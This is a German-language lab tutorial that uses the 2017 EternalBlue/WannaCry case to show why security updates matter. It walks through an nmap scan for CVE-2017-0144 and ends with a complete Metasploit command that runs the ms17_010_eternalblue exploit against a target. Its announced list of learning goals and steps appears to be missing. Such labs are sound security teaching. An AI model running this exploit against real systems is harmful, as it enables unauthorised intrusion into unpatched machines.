Im Jahr 2017 führte die Sicherheitslücke EternalBlue im SMBv1-Protokoll (Server Message Block, ein Netzwerkprotokoll für Datei- und Druckerfreigaben) dazu, dass die Ransomware WannaCry weltweit ungepatchte Systeme angreifen konnte. Innerhalb weniger Stunden wurden Millionen Computer infiziert, Daten verschlüsselt und Lösegeldforderungen gestellt. Dies hätte durch regelmäßige Sicherheitsupdates verhindert werden können.
Dieses Lab zeigt in einer sicheren Umgebung, wie solche Angriffe auf ungepatchte Systeme ablaufen können und warum Sicherheitsupdates so entscheidend sind. Du wirst lernen:
Ziel dieses Labs ist es, dir ein besseres Verständnis für die Bedeutung von regelmäßigen Updates zu geben und zu zeigen, wie schnell Angreifer ungepatchte Systeme ausnutzen können. Die Simulation wird dabei in drei Schritten durchgeführt:
Durch diese Simulationen sollst du nicht nur verstehen, wie Angriffe ablaufen, sondern auch, wie du solche Bedrohungen mit einfachen Maßnahmen, wie z. B. dem Einspielen von Sicherheitsupdates, verhindern kannst.
Führe einen erweiterten Netzwerkscan durch, um herauszufinden, welche Geräte im Netzwerk erreichbar sind. Dabei kommen erweiterte Scan-Parameter
zum Einsatz (z.B. -A -sS -sV -O
), um neben offenen Ports auch Betriebssystemdetails, Versionsinformationen und Sicherheitslücken wie CVE-2017-0144 zu erkennen.
Hinweis: Der Einsatz von nmap auf fremden IP-Adressen ohne Genehmigung ist illegal.
LHOST=192.168.1.100 Ziel IP-Adresse 1=192.168.1.10 Ziel IP-Adresse 2=192.168.1.20
Jetzt greifen wir das anfällige System an. Gib den folgenden Befehl ein und ersetze [RHOST]
mit der IP des angreifbaren Systems:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set LHOST 192.168.1.100; set RHOST [RHOST]; run"